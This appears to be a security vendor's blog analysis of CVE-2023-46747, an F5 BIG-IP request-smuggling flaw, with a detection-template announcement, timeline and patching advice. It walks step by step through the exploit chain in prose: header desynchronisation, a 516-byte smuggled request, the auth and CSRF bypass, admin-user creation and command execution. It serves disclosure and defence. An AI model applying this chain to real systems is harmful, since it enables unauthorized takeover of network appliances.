CVE-2023-46747 is a critical vulnerability in the F5 BIG-IP Configuration Utility identified as a request smuggling bug within the Apache JServ Protocol (AJP). The flaw could potentially allow unauthenticated attackers with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands. This vulnerability was discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security. It has a CVSS score of 9.8: critical severity.
The attack primarily exploits the HTTP to AJP request smuggling due to inconsistencies in handling Content-Length/Transfer-Encoding headers between Apache HTTPd and AJP Processing in Tomcat. Here's a breakdown:
1. Origin of the Discrepancy: Apache HTTPd receives an HTTP request with a
Transfer-Encoding: chunked, chunked header, which it then sends to Tomcat via AJP. Tomcat, expecting
Transfer-Encoding to be just
chunked, doesn't find a match. It then looks for a
Content-length header, which isn't there, so it defaults to assuming a Content-length of 0.
2. Resulting Desynchronization: This misunderstanding means the AJP Data packet (essentially the POST Body of the HTTP request) is misinterpreted as a separate AJP Forward Request packet.
3. Exploiting the Gap: Attackers, by crafting the POST body to precisely 516 bytes (0x204 bytes), can evade the initial authentication checks and access specific /tmui/ endpoints directed to the AJP port.
4. Bypassing Further Checks: There are additional authentication steps on many /tmui/* pages. Overcoming these requires:
- Setting the
REMOTE_USER attribute which can be done at the AJP level.
- Providing a
REMOTEROLE request header with any valid integer role id, ensuring successful authentication bypass.
5. Gaining Full Access: The goal is to find requests under 516 bytes that grant admin user access or allow remote code execution. One such request was discovered that creates an admin user through the BIG-IP UI, specifically targeting the /tmui/Control/form endpoint. Though initially oversized, the request was slimmed down by removing redundant parameters to fit within the 516-byte limit.
6. Overcoming Final Hurdles: A CSRF check exist in the user creation action that ensures if the
_bufvalue parameter matches the base64 SHA1 digest of the
Tmui-Dubbuf header and the
_timenow parameter concatenated together. Given the full control of the request we could calculate these values ahead of time. Also, to meet the requirement of exact 0x204 bytes of packet size, padding with extra "B"s in the
Tmui-Dubbuf header was added.
7. Endgame: TL;DR: attackers can establish an admin user without prior authentication. Once this is done, they can use built-in F5 functionalities to run Bash commands, allowing them to execute code.
The ProjectDiscovery research team compiled a template so that all nuclei users can detect exploitable vulnerabilities to CVE-2023-46747 in their attack surface. This was developed within 5 days of the CVE notification, and just 24 hours after the public disclosure of the details of the vulnerability.
- October 26, 2023: Initial advisory and limited details for CVE-2023-46747 were published.
- October 30, 2023: The Nuclei Template was released by the ProjectDiscovery Research Team.
- October 31, 2023: Full disclosure of the vulnerability was publicly shared by Praetorian
Patching is the strongly recommended course of action to remediate this vulnerability. F5 has provided mitigation guidance alongside patching, especially if patching cannot be performed immediately. It is advisable to review the F5 article here for recommended mitigation steps and warnings. Additionally, F5 has cautioned that the provided mitigation script must NOT be used on BIG-IP versions prior to 14.1.0.
- Help Net Security Article: F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747)
- Tenable Blog Post: CVE-2023-46747: Critical Authentication Bypass Vulnerability
- NVD Entry: CVE-2023-46747
- F5 Security Advisory: K000137353: BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747
- Praetorian Blog Post: The Discovery of F5 BIG-IP Vulnerability CVE-2023-46747